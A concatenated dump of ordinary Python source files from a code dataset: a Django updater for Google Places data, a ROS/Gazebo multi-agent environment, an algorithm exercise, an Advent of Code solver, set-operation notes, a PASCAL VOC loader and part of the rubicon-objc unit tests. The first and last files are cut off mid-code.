JSON of establishment '{0}' from Google\".format(establishment))\n return\n elif type(e_json) != dict:\n print_log(LOG_LEVEL_ERROR, \"got unexpected JSON of establishment '{0}' from Google: type: {1} | repr: {2}\".format(establishment, type(e_json), repr(e_json)))\n return\n\n ####################\n # Updating address #\n ####################\n data = get_address(e_json)\n if data == None:\n print_log(LOG_LEVEL_ERROR, \"can't get address of establishment '{0}'\".format(establishment))\n else:\n data_old = establishment.address\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new address: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.address = data\n has_change = True\n\n ##################\n # Updating phone #\n ##################\n data = get_phone(e_json)\n if data == None:\n print_log(LOG_LEVEL_INFO, \"can't get phone of establishment '{0}'\".format(establishment))\n else:\n try:\n gphone = TypeOfPhone.objects.select_related().get(name=PHONE_GOOGLE)\n data_old_set = establishment.phone.select_related().filter(description=gphone)\n data_old = data_old_set.first()\n for d in data_old_set[1:]:\n print_log(LOG_LEVEL_WARNING, \"deleting extra {0} phone '{1}' found in establishment {2}\".format(PHONE_GOOGLE, d, establishment))\n d.delete()\n if not data_old_set:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new {1} phone: from 'None' to '{2}'\".format(establishment, PHONE_GOOGLE, data))\n if type(establishment) == Attraction:\n p = Phone(description=gphone, number=data, attraction=establishment, active=True)\n elif type(establishment) == Service:\n p = Phone(description=gphone, number=data, service=establishment, active=True)\n else:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment '{0}' of type '{1}' - and how did you get here??\".format(establishment, type(establishment)))\n p.save()\n has_change = True\n elif data != data_old.number:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new {1} phone: from '{2}' to '{3}'\".format(establishment, PHONE_GOOGLE, data_old, data))\n data_old.number = data\n data_old.active = True\n data_old.save()\n has_change = True # unnecessary\n except TypeOfPhone.DoesNotExist:\n print_log(LOG_LEVEL_ERROR, \"can't get type of phone '{0}'\".format(PHONE_GOOGLE))\n except:\n print_error()\n\n #####################\n # Updating latitude #\n #####################\n data = get_latitude(e_json)\n if data == None:\n print_log(LOG_LEVEL_ERROR, \"can't get latitude of establishment '{0}'\".format(establishment))\n else:\n data_old = establishment.latitude\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new latitude: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.latitude = data\n has_change = True\n\n ######################\n # Updating longitude #\n ######################\n data = get_longitude(e_json)\n if data == None:\n print_log(LOG_LEVEL_ERROR, \"can't get longitude of establishment '{0}'\".format(establishment))\n else:\n data_old = establishment.longitude\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new longitude: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.longitude = data\n has_change = True\n\n #################\n # Updating name #\n #################\n data = get_name(e_json)\n if data == None:\n print_log(LOG_LEVEL_ERROR, \"can't get name of establishment '{0}'\".format(establishment))\n else:\n data_old = establishment.google_name\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new Google name: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.google_name = data\n has_change = True\n\n ###################\n # Updating rating #\n ###################\n data = get_rating(e_json)\n if data == None:\n print_log(LOG_LEVEL_ERROR, \"can't get rating of establishment '{0}'\".format(establishment))\n else:\n data_old = establishment.google_rating\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new rating: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.google_rating = data\n has_change = True\n\n ###################\n # Updating status #\n ###################\n data = not get_permanently_closed(e_json)\n data_old = establishment.active\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new status: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.active = data\n has_change = True\n\n ####################\n # Updating website #\n ####################\n data = get_website(e_json)\n if data == None:\n print_log(LOG_LEVEL_INFO, \"can't get website of establishment '{0}'\".format(establishment))\n else:\n try:\n gwebsite = SubtypeOfExternalReference.objects.select_related().get(name=WEBSITE_GOOGLE_SUBT, typeOfExternalReference__name=WEBSITE_GOOGLE_TYPE)\n data_old_set = establishment.external_reference.select_related().filter(subtypeOfExternalReference=gwebsite)\n data_old = data_old_set.first()\n for d in data_old_set[1:]:\n print_log(LOG_LEVEL_WARNING, \"deleting extra {0} external reference '{1}' found in establishment {2}\".format(gwebsite, d, establishment))\n d.delete()\n if not data_old_set:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new {1} external reference: from 'None' to '{2}'\".format(establishment, gwebsite, data))\n if type(establishment) == Attraction:\n e = ExternalReference(subtypeOfExternalReference=gwebsite, url=data, attraction=establishment)\n elif type(establishment) == Service:\n e = ExternalReference(subtypeOfExternalReference=gwebsite, url=data, service=establishment)\n else:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment '{0}' of type '{1}' - and how did you get here??\".format(establishment, type(establishment)))\n e.save()\n has_change = True\n elif data != data_old.url:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new {1} external reference: from '{2}' to '{3}'\".format(establishment, gwebsite, data_old, data))\n data_old.url = data\n data_old.save()\n except SubtypeOfExternalReference.DoesNotExist:\n print_log(LOG_LEVEL_ERROR, \"can't get subtype of external reference '{0}' of type '{1}'\".format(WEBSITE_GOOGLE_SUBT, WEBSITE_GOOGLE_TYPE))\n except:\n print_error()\n\n ###########################\n # Updating opening hours #\n ###########################\n data_json = get_opening_hours(e_json)\n if data_json == None:\n print_log(LOG_LEVEL_INFO, \"can't get opening hour of establishment '{0}'\".format(establishment))\n else:\n try:\n if type(establishment) == Attraction:\n OpeningHour.objects.select_related().filter(attraction=establishment).delete()\n elif type(establishment) == Service:\n OpeningHour.objects.select_related().filter(service=establishment).delete()\n else:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment '{0}' of type '{1}' - and how did you get here??\".format(establishment, type(establishment)))\n print(data_json)\n for ow in data_json:\n try:\n day = ow['open']['day']\n opensAt_str = ow['open']['time']\n close = ow.get('close', None)\n closesAt_str = close['time'] if close != None else None\n except KeyError:\n print_log(LOG_LEVEL_ERROR, \"wrong format on opening hour of establishment {0}\".format(establishment))\n continue\n except:\n print_error()\n opensAt = time(int(opensAt_str[:2]), int(opensAt_str[2:]))\n closesAt = time(int(closesAt_str[:2]), int(closesAt_str[2:])) if closesAt_str else None\n if type(establishment) == Attraction:\n ow_obj = OpeningHour(attraction=establishment, day=day, opensAt=opensAt, closesAt=closesAt)\n else:\n ow_obj = OpeningHour(service=establishment, day=day, opensAt=opensAt, closesAt=closesAt)\n ow_obj.save()\n print_log(LOG_LEVEL_INFO, \"got opening hour for establishment '{0}': {1}\".format(establishment, ow_obj))\n except:\n print_error()\n\n if has_change == True:\n print_log(LOG_LEVEL_INFO, \"saving change(s) on establishment '{0}': started\".format(establishment))\n establishment.save()\n print_log(LOG_LEVEL_INFO, \"saving change(s) on establishment '{0}': finished\".format(establishment))\n else:\n print_log(LOG_LEVEL_INFO, \"none changes found on establishment '{0}'\".format(establishment))\n\ndef run(establishments):\n if type(establishments) != QuerySet:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment QuerySet {0} of type '{1}'\".format(establishments, type(establishments)))\n return None\n\n if establishments.model not in [Attraction, Service]:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment model of type '{0}'\".format(establishments.model))\n return None\n\n for e in establishments:\n try:\n update(e)\n except:\n print_error()\n\ndef main():\n establishments = Attraction.objects.select_related().all()\n run(establishments)\n establishments = Service.objects.select_related().all()\n run(establishments)\n\nif __name__ == '__main__':\n main()\n ","sub_path":"osg/establishment_update.py","file_name":"establishment_update.py","file_ext":"py","file_size_in_byte":15239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"373554017","text":"import rospy\nimport numpy as np\nimport random\nfrom std_srvs.srv import Empty\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom gazebo_connection import GazeboConnection\nfrom tf.transformations import quaternion_from_euler\n\n'''\n---------------------------------------------------------------------------------------------------\nAdapted and simplified from OpenAI's Multiagent Particle Environment class for use with a ROS\nGazebo world with a discrete action space. Continuous action space has not been implemented.\nSteps through the Gazebo simulation, gathering observations and assigning actions and rewards\nfor each agent at each time step.\n\nAuthor: Joseph Pickens, August Soderberg\n---------------------------------------------------------------------------------------------------\n'''\nclass MultiAgentGazeboEnv():\n def __init__(self, num_agents, reset_callback=None, reward_callback=None,\n observation_callback=None, info_callback=None, done_callback=None):\n # scenario callbacks\n self.reset_callback = reset_callback\n self.reward_callback = reward_callback\n self.observation_callback = observation_callback\n self.info_callback = info_callback\n self.done_callback = done_callback\n\n self.num_agents = num_agents\n self.vel_pubs = []\n for i in range(self.num_agents):\n # robot namespaces are assumed to be 'robot1', 'robot2', ...\n self.vel_pubs.append(rospy.Publisher('/robot%d/cmd_vel' % (i+1), Twist, queue_size=1))\n \n # TODO: speed definition should be specific to the scenario from which callbacks are\n # defined, rather than be defined here in the general multiagent environment class.\n self.linear_speed = 2.0\n self.angular_speed = 2.0\n\n self.gazebo = GazeboConnection(False, 'WORLD')\n\n def step(self, action_n):\n obs_n = []\n reward_n = []\n done_n = []\n info_n = {'n': []}\n\n self.gazebo.unpause_sim()\n for i, action in enumerate(action_n):\n self._set_action(action, i)\n self.gazebo.pause_sim()\n\n # record observation, etc. for each agent\n for i, _ in enumerate(action_n):\n obs_n.append(self._get_obs(i))\n reward_n.append(self._get_reward(i))\n done_n.append(self._get_done(i))\n info_n['n'].append(self._get_info(i))\n\n return obs_n, reward_n, done_n, info_n\n\n def reset(self):\n # Resets the state of the environment and returns an initial observation.\n for i in range(self.num_agents):\n model_name = 'Robot%d' % (i + 1)\n x = random.uniform(-1.2, 1.2)\n y = random.uniform(-1.2, 1.2)\n z = 0.35\n q = quaternion_from_euler(0, 0, random.uniform(0, 6.28))\n pose = [x, y, z]\n pose.extend(q)\n self.gazebo.set_model_state(model_name, pose)\n self.gazebo.unpause_sim()\n self.gazebo.pause_sim()\n obs_n = []\n for i in range(self.num_agents):\n obs_n.append(self._get_obs(i))\n return obs_n\n\n # get info used for benchmarking\n def _get_info(self, agent):\n if self.info_callback is None:\n return {}\n return self.info_callback(agent, self.world)\n\n # get observation for a particular agent\n def _get_obs(self, agent):\n if self.observation_callback is None:\n return np.zeros(0)\n return self.observation_callback(agent)\n\n # get dones for a particular agent\n def _get_done(self, agent):\n if self.done_callback is None:\n return False\n return self.done_callback(agent)\n\n # get reward for a particular agent\n def _get_reward(self, agent):\n if self.reward_callback is None:\n return 0.0\n return self.reward_callback(agent)\n\n # set env discrete action for a particular agent\n # action must be a list of 4 binary variables: [forward, backward, left, right]\n def _set_action(self, action, agent):\n t = Twist()\n t.linear.x = (action[0] - action[1]) * self.linear_speed\n t.angular.z = (action[2] - action[3]) * self.angular_speed\n self.vel_pubs[agent].publish(t)\n","sub_path":"src/multiagent_env.py","file_name":"multiagent_env.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"192815089","text":"# 0920\n# 가장 큰 정사각형 찾기\n# idea: 다이나믹 프로그래밍\ndef solution(board):\n n = len(board)\n m = len(board[0])\n\n dp = [[0] * m for _ in range(n)]\n dp[0] = board[0]\n for i in range(1, n):\n dp[i][0] = board[i][0]\n\n for i in range(1, n):\n for j in range(1, m):\n if board[i][j] == 1:\n dp[i][j] = min(dp[i - 1][j - 1], dp[i - 1][j], dp[i][j - 1]) + 1\n\n answer = 0\n for i in range(n):\n temp = max(dp[i])\n answer = max(answer, temp)\n print(dp)\n return answer ** 2\n\nprint(solution([[0,1,1,1],[1,1,1,1],[1,1,1,1],[0,0,1,0]]))","sub_path":"Level 2/가장 큰 정사각형 찾기.py","file_name":"가장 큰 정사각형 찾기.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"277970247","text":"#!/usr/bin/env python3\nimport sys\n\n\ndef main():\n with open('21_input.txt', 'r') as rules_file:\n lines = rules_file.read().strip().split('\\n')\n\n rules = expand_rules(lines)\n art = to_pixel('.#./..#/###')\n for i in range(18):\n size = len(art[0])\n d = (2 if size % 2 == 0 else 3)\n partitions = partition(art, d)\n art = apply_rules(art, partitions, rules, d)\n\n print('Answer:', light_on_count(art))\n\n\ndef expand_rules(lines):\n expanded_rules = {} \n for line in lines:\n lhs, rhs = map(to_pixel, line.split('=>'))\n for r in range(4):\n expanded_rules[lhs] = rhs\n expanded_rules[flip(lhs)] = rhs\n lhs = rotate(lhs)\n return expanded_rules\n\n\ndef to_pixel(text):\n bits = {'.': 0, '#': 1}\n pixels = []\n for token in text.split('/'):\n pixels.append(tuple(bits[p] for p in token.strip()))\n return tuple(pixels)\n\n\ndef rotate(text):\n return tuple(zip(*reversed(text)))\n\n\ndef flip(text):\n return tuple(tuple(reversed(row)) for row in text)\n\n\ndef partition(art, d):\n res = []\n for outer_row in range(0, len(art), d):\n for inner_col in range(0, len(art[0]), d):\n tmp = [] \n for inner_row in range(outer_row, outer_row+d):\n tmp.append(tuple(art[inner_row][inner_col:inner_col+d]))\n res.append(tuple(tmp))\n return tuple(res)\n\n\ndef apply_rules(art, partitions, rules, d):\n output = tuple(rules[partition] for partition in partitions)\n height_in_boxes = len(art) // d\n expand_map = {2:3, 3:4}\n new_art = []\n for rows in range(0, len(partitions), height_in_boxes):\n for i in range(expand_map[d]):\n tmp = []\n for j in range(rows, rows+height_in_boxes):\n tmp.extend(output[j][i])\n new_art.append(tuple(tmp))\n return tuple(new_art)\n\n\ndef light_on_count(art):\n count = 0\n for row in art:\n count += row.count(1) \n return count\n\n\ndef print_art(art):\n for row in art:\n print(row)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2017/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"246617163","text":"def Set():\n\t'''\n\t\tWhy sets?\n\t\tSet operations have a variety of common uses, some more practical than mathematical.\n\t\tFor example, because items are stored only once in a set, sets can be used to filter\n\t\tduplicates out of other collections, though items may be reordered in the process because\n\t\tsets are unordered in general. Simply convert the collection to a set, and then\n\t\tconvert it back again (sets work in the list call here because they are iterable, another\n\t\ttechnical artifact that we’ll unearth later):\n\t'''\n\tX = set('spam')\n\t{'m', 'a', 'p', 's'}\n\n\tY = {'h', 'a', 'm'} # Make a set with set literals in 3.X and 2.7\n\t{'m', 'a', 'h'}\n\ndef Set_Operations():\n\tx = set('abcde')\n\ty = set('bdxyz')\n\n\tx - y \t\t\t\t\t\t\t\t\t\t\t\t# Difference\n\tset(['a', 'c', 'e'])\n\n\tx | y \t\t\t\t\t\t\t\t\t\t\t\t# Union\n\tset(['a', 'c', 'b', 'e', 'd', 'y', 'x', 'z'])\n\n\tx & y \t\t\t\t\t\t\t\t\t\t\t\t# Intersection\n\tset(['b', 'd'])\n\n\tx ^ y \t\t\t\t\t\t\t\t\t\t\t\t# Symmetric difference (XOR)\n\tset(['a', 'c', 'e', 'y', 'x', 'z'])\n\n\tx > y, x < y \t\t\t\t\t\t\t\t\t\t# Superset, subset\n\t(False, False)\n\n\t'e' in x\t\t\t\t\t\t\t\t\t\t\t# Membership (sets)\n\tTrue\n\ndef Set_comprehensions():\n\ta=set('spam')\n\ta={x for x in 'spam'} # Same as: set('spam')\n\t{'m', 's', 'p', 'a'}\n\n\t{c * 4 for c in 'spam'} # Set of collected expression results\n\t{'pppp', 'aaaa', 'ssss', 'mmmm'}\n\n\ndef Set_Functions():\n\tx = set('abcde')\n\ty = set('bdxyz')\n\n\tz = x.intersection(y)# Same as x & y\n\t# >>> z = set(['b', 'd'])\n\n\tz.add('SPAM') # to add element to set \t\t\t\t\t# Insert one item\n\t# >>> z= set(['b', 'd', 'SPAM'])\n\n\tz.update(set(['X', 'Y'])) # to add set to another\t\t# Merge: in-place union\n\t# >>> z= set(['Y', 'X', 'b', 'd', 'SPAM'])\n\n\tz.remove('b') # Delete one item\n\t# >>> set(['Y', 'X', 'd', 'SPAM'])\n\n\tx,y={1,2,3},{1,2,3,4,5}\n\tx.issubset(y) #>>> True\n\n\ty.union(x) # # Same as x | y , y+x\n\t#>>> {'a','b','c','d','e','z','y','x'}\n\n\nif __name__=='__main__':\n\t()\n\n","sub_path":"Learning_python/07.Set.py","file_name":"07.Set.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"576281528","text":"from scipy.misc import imread\nimport numpy as np\nimport sys\nimport os\n\nif sys.version_info[0] == 2:\n import xml.etree.cElementTree as ET\nelse:\n import xml.etree.ElementTree as ET\n\nVOC_CLASSES = [\n 'aeroplane', 'bicycle', 'bird', 'boat',\n 'bottle', 'bus', 'car', 'cat', 'chair',\n 'cow', 'diningtable', 'dog', 'horse',\n 'motorbike', 'person', 'pottedplant',\n 'sheep', 'sofa', 'train', 'tvmonitor']\n\n\nclass VOCLoader:\n def __init__(self, root, image_sets, prop_method):\n if prop_method == 'ss':\n prop_dir = os.path.join('../data', 'voc07_proposals', 'selective_search')\n elif prop_method == 'eb':\n prop_dir = os.path.join('../data', 'voc07_proposals', 'edge_boxes_70')\n elif prop_method == 'mcg':\n prop_dir = os.path.join('../data', 'voc07_proposals', 'MCG2015')\n else:\n raise Exception('Undefined proposal name')\n self.items = []\n self.num_classes = 0\n self.name_to_index = dict(zip(VOC_CLASSES, range(len(VOC_CLASSES))))\n print('dataset loading...' + repr(image_sets))\n for (year, name) in image_sets:\n rootpath = os.path.join(root, 'VOC' + year)\n for line in open(os.path.join(rootpath, 'ImageSets', 'Main', name + '.txt')):\n data = {}\n id = line.strip()\n target = ET.parse(os.path.join(rootpath, 'Annotations', line.strip() + '.xml'))\n\n box_set = []\n category_set = []\n for obj in target.iter('object'):\n cls_name = obj.find('name').text.strip().lower()\n bbox = obj.find('bndbox')\n\n xmin = int(bbox.find('xmin').text) - 1\n ymin = int(bbox.find('ymin').text) - 1\n xmax = int(bbox.find('xmax').text) - 1\n ymax = int(bbox.find('ymax').text) - 1\n\n category = self.name_to_index[cls_name]\n box_set.append(np.array([xmin, ymin, xmax, ymax], np.float32))\n category_set.append(category)\n\n data['id'] = id\n data['boxes'] = np.array(box_set)\n data['categories'] = np.array(category_set, np.long)\n data['img_full_path'] = os.path.join(rootpath, 'JPEGImages', line.strip() + '.jpg')\n data['prop_path'] = os.path.join(prop_dir, 'mat', id[:4], '%s.mat' % id)\n self.items.append(data)\n\n print('dataset loading complete')\n\n def __len__(self):\n return len(self.items)\n\n\nclass VOCLoaderFewShot:\n def __init__(self, root, image_sets, K):\n self.items = []\n self.num_classes = 0\n self.name_to_index = dict(zip(VOC_CLASSES, range(len(VOC_CLASSES))))\n\n dupl_check = {}\n print('dataset loading...' + repr(image_sets))\n for (year, name) in image_sets:\n rootpath = os.path.join(root, 'VOC' + year)\n for cls, cls_name in enumerate(VOC_CLASSES):\n anno_file = open(os.path.join(rootpath, 'ImageSets', 'Main', cls_name + '_trainval.txt')).readlines()\n k = 0\n for idx in np.random.permutation(len(anno_file)):\n line, exist = anno_file[idx].split()\n if exist == '-1':\n continue\n if line.strip() in dupl_check:\n print('dupl')\n continue\n dupl_check[line.strip()] = True\n data = {}\n id = 'VOC' + year + '_' + line.strip()\n target = ET.parse(os.path.join(rootpath, 'Annotations', line.strip() + '.xml'))\n\n box_set = []\n category_set = []\n for obj in target.iter('object'):\n cls_name = obj.find('name').text.strip().lower()\n bbox = obj.find('bndbox')\n\n xmin = int(bbox.find('xmin').text) - 1\n ymin = int(bbox.find('ymin').text) - 1\n xmax = int(bbox.find('xmax').text) - 1\n ymax = int(bbox.find('ymax').text) - 1\n\n category = self.name_to_index[cls_name]\n box_set.append(np.array([xmin, ymin, xmax, ymax], np.float32))\n category_set.append(category)\n\n data['id'] = id\n data['boxes'] = np.array(box_set)\n data['categories'] = np.array(category_set, np.long)\n data['img_full_path'] = os.path.join(rootpath, 'JPEGImages', line.strip() + '.jpg')\n self.items.append(data)\n k += 1\n if k == K:\n break\n\n print('dataset loading complete')\n\n def __len__(self):\n return len(self.items)","sub_path":"lib/datasets/voc_loader.py","file_name":"voc_loader.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"259798218","text":"from ctypes import *\nfrom ctypes import util\nfrom decimal import Decimal\nfrom enum import Enum\nimport functools\nimport math\nimport unittest\n\ntry:\n import platform\n OSX_VERSION = tuple(int(v) for v in platform.mac_ver()[0].split('.')[:2])\nexcept Exception:\n OSX_VERSION = None\n\nimport faulthandler\nfaulthandler.enable()\n\nfrom rubicon.objc import (\n ObjCInstance, ObjCClass, ObjCMetaClass,\n NSObject, SEL,\n objc, objc_method, objc_classmethod, objc_property,\n NSUInteger, NSRange, NSEdgeInsets, NSEdgeInsetsMake,\n send_message, objc_const, ObjCBlock\n)\nfrom rubicon.objc import core_foundation, types\nfrom rubicon.objc.objc import ObjCBoundMethod, objc_block, objc_id, Class, Block\n\n# Load the test harness library\nrubiconharness_name = util.find_library('rubiconharness')\nif rubiconharness_name is None:\n raise RuntimeError(\"Couldn't load Rubicon test harness library. Have you set DYLD_LIBRARY_PATH?\")\nrubiconharness = CDLL(rubiconharness_name)\n\n\nclass RubiconTest(unittest.TestCase):\n def test_sel_by_name(self):\n self.assertEqual(SEL(b\"foobar\").name, b\"foobar\")\n\n def test_sel_null(self):\n with self.assertRaises(ValueError):\n SEL(None).name\n\n def test_class_by_name(self):\n \"\"\"An Objective-C class can be looked up by name.\"\"\"\n\n Example = ObjCClass(\"Example\")\n self.assertEqual(Example.name, \"Example\")\n\n def test_objcclass_caching(self):\n \"\"\"ObjCClass instances are cached.\"\"\"\n\n Example1 = ObjCClass(\"Example\")\n Example2 = ObjCClass(\"Example\")\n\n self.assertIs(Example1, Example2)\n\n def test_class_by_pointer(self):\n \"\"\"An Objective-C class can be created from a pointer.\"\"\"\n\n example_ptr = objc.objc_getClass(b\"Example\")\n Example = ObjCClass(example_ptr)\n self.assertEqual(Example, ObjCClass(\"Example\"))\n\n def test_nonexistant_class(self):\n \"\"\"A NameError is raised if a class doesn't exist.\"\"\"\n\n with self.assertRaises(NameError):\n ObjCClass('DoesNotExist')\n\n def test_metaclass_by_name(self):\n \"\"\"An Objective-C metaclass can be looked up by name.\"\"\"\n\n Example = ObjCClass(\"Example\")\n ExampleMeta = ObjCMetaClass(\"Example\")\n\n self.assertEqual(ExampleMeta.name, \"Example\")\n self.assertEqual(ExampleMeta, Example.objc_class)\n\n def test_objcmetaclass_caching(self):\n \"\"\"ObjCMetaClass instances are cached.\"\"\"\n\n ExampleMeta1 = ObjCMetaClass(\"Example\")\n ExampleMeta2 = ObjCMetaClass(\"Example\")\n\n self.assertIs(ExampleMeta1, ExampleMeta2)\n\n def test_metaclass_by_pointer(self):\n \"\"\"An Objective-C metaclass can be created from a pointer.\"\"\"\n\n examplemeta_ptr = objc.objc_getMetaClass(b\"Example\")\n ExampleMeta = ObjCMetaClass(examplemeta_ptr)\n self.assertEqual(ExampleMeta, ObjCMetaClass(\"Example\"))\n\n def test_nonexistant_metaclass(self):\n \"\"\"A NameError is raised if a metaclass doesn't exist.\"\"\"\n\n with self.assertRaises(NameError):\n ObjCMetaClass('DoesNotExist')\n\n def test_metametaclass(self):\n \"\"\"The class of a metaclass can be looked up.\"\"\"\n\n ExampleMeta = ObjCMetaClass(\"Example\")\n ExampleMetaMeta = ExampleMeta.objc_class\n\n self.assertIsInstance(ExampleMetaMeta, ObjCMetaClass)\n self.assertEqual(ExampleMetaMeta, NSObject.objc_class)\n\n def test_objcinstance_can_produce_objcclass(self):\n \"\"\"Creating an ObjCInstance for a class pointer gives an ObjCClass.\"\"\"\n\n example_ptr = objc.objc_getClass(b\"Example\")\n Example = ObjCInstance(example_ptr)\n self.assertEqual(Example, ObjCClass(\"Example\"))\n self.assertIsInstance(Example, ObjCClass)\n\n def test_objcinstance_can_produce_objcmetaclass(self):\n \"\"\"Creating an ObjCInstance for a metaclass pointer gives an ObjCMetaClass.\"\"\"\n\n examplemeta_ptr = objc.objc_getMetaClass(b\"Example\")\n ExampleMeta = ObjCInstance(examplemeta_ptr)\n self.assertEqual(ExampleMeta, ObjCMetaClass(\"Example\"))\n self.assertIsInstance(ExampleMeta, ObjCMetaClass)\n\n def test_objcclass_can_produce_objcmetaclass(self):\n \"\"\"Creating an ObjCClass for a metaclass pointer gives an ObjCMetaclass.\"\"\"\n\n examplemeta_ptr = objc.objc_getMetaClass(b\"Example\")\n ExampleMeta = ObjCClass(examplemeta_ptr)\n self.assertEqual(ExampleMeta, ObjCMetaClass(\"Example\"))\n self.assertIsInstance(ExampleMeta, ObjCMetaClass)\n\n def test_objcclass_requires_class(self):\n \"\"\"ObjCClass only accepts class pointers.\"\"\"\n\n random_obj = NSObject.alloc().init()\n with self.assertRaises(ValueError):\n ObjCClass(random_obj.ptr)\n random_obj.release()\n\n def test_objcmetaclass_requires_metaclass(self):\n \"\"\"ObjCMetaClass only accepts metaclass pointers.\"\"\"\n\n random_obj = NSObject.alloc().init()\n with self.assertRaises(ValueError):\n ObjCMetaClass(random_obj.ptr)\n random_obj.release()\n\n with self.assertRaises(ValueError):\n ObjCMetaClass(NSObject.ptr)\n\n def test_objcclass_superclass(self):\n Example = ObjCClass(\"Example\")\n BaseExample = ObjCClass(\"BaseExample\")\n\n self.assertEqual(Example.superclass, BaseExample)\n self.assertEqual(BaseExample.superclass, NSObject)\n self.assertIsNone(NSObject.superclass)\n\n def test_objcmetaclass_superclass(self):\n Example = ObjCClass(\"Example\")\n BaseExample = ObjCClass(\"BaseExample\")\n\n self.assertEqual(Example.objc_class.superclass, BaseExample.objc_class)\n self.assertEqual(BaseExample.objc_class.superclass, NSObject.objc_class)\n self.assertEqual(NSObject.objc_class.superclass, NSObject)\n\n def test_field(self):\n \"A field on an instance can be accessed and mutated\"\n\n Example = ObjCClass('Example')\n\n obj = Example.alloc().init()\n\n self.assertEqual(obj.baseIntField, 22)\n self.assertEqual(obj.intField, 33)\n\n obj.baseIntField = 8888\n obj.intField = 9999\n\n self.assertEqual(obj.baseIntField, 8888)\n self.assertEqual(obj.intField, 9999)\n\n def test_method(self):\n \"An instance method can be invoked.\"\n Example = ObjCClass('Example')\n\n obj = Example.alloc().init()\n\n self.assertEqual(obj.accessBaseIntField(), 22)\n self.assertEqual(obj.accessIntField(), 33)\n\n obj.mutateBaseIntFieldWithValue_(8888)\n obj.mutateIntFieldWithValue_(9999)\n\n self.assertEqual(obj.accessBaseIntField(), 8888)\n self.assertEqual(obj.accessIntField(), 9999)\n\n def test_method_send(self):\n \"An instance method can be invoked with send_message.\"\n Example = ObjCClass('Example')\n\n obj = Example.alloc().init()\n\n self.assertEqual(send_message(obj, \"accessBaseIntField\", restype=c_int), 22)\n self.assertEqual(send_message(obj, \"accessIntField\", restype=c_int), 33)\n\n send_message(obj, \"mutateBaseIntFieldWithValue:\", 8888, restype=None, argtypes=[c_int])\n send_message(obj, \"mutateIntFieldWithValue:\", 9999, restype=None, argtypes=[c_int])\n\n self.assertEqual(send_message(obj, \"accessBaseIntField\", restype=c_int), 8888)\n self.assertEqual(send_message(obj, \"accessIntField\", restype=c_int), 9999)\n\n def test_static_field(self):\n \"A static field on a class can be accessed and mutated\"\n Example = ObjCClass('Example')\n\n Example.mutateStaticBaseIntFieldWithValue_(1)\n Example.mutateStaticIntFieldWithValue_(11)\n\n self.assertEqual(Example.staticBaseIntField, 1)\n self.assertEqual(Example.staticIntField, 11)\n\n Example.staticBaseIntField = 1188\n Example.staticIntField = 1199\n\n self.assertEqual(Example.staticBaseIntField, 1188)\n self.assertEqual(Example.staticIntField, 1199)\n\n def test_static_method(self):\n \"A static method on a class can be invoked.\"\n Example = ObjCClass('Example')\n\n Example.mutateStaticBaseIntFieldWithValue_(2288)\n Example.mutateStaticIntFieldWithValue_(2299)\n\n self.assertEqual(Example.accessStaticBaseIntField(), 2288)\n self.assertEqual(Example.accessStaticIntField(), 2299)\n\n def test_mutator_like_method(self):\n \"A method that looks like a mutator doesn't confuse issues.\"\n Example = ObjCClass('Example')\n\n obj1 = Example.alloc().init()\n\n # setSpecialValue: looks like it might be a mutator\n # for a specialValue property, but this property doesn't exist.\n\n # We can invoke the method directly...\n obj1.setSpecialValue_(42)\n\n # ... but retrieving like a property is an error\n with self.assertRaises(AttributeError):\n obj1.specialValue\n\n # ...until you set it explicitly...\n obj1.specialValue = 37\n\n # ...at which point it's fair game to be retrieved.\n self.assertEqual(obj1.specialValue, 37)\n\n def test_property_forcing(self):\n \"An instance or property method can be explicitly declared as a property.\"\n Example = ObjCClass('Example')\n Example.declare_class_property('classMethod')\n Example.declare_class_property('classAmbiguous')\n Example.declare_property('instanceMethod')\n Example.declare_property('instanceAmbiguous')\n\n # A class method can be turned into a property\n self.assertEqual(Example.classMethod, 37)\n\n # An actual class property can be accessed as a property\n self.assertEqual(Example.classAmbiguous, 37)\n\n # An instance property can be accessed\n obj1 = Example.alloc().init()\n\n # An instance method can be turned into a property\n self.assertEqual(obj1.instanceMethod, 42)\n\n # An actual property can be accessed as a property\n self.assertEqual(obj1.instanceAmbiguous, 42)\n\n # Practical example: In Sierra, mainBundle was turned into a class property.\n # Previously, it was a method.\n NSBundle = ObjCClass('NSBundle')\n NSBundle.declare_class_property('mainBundle')\n self.assertFalse(type(NSBundle.mainBundle) == 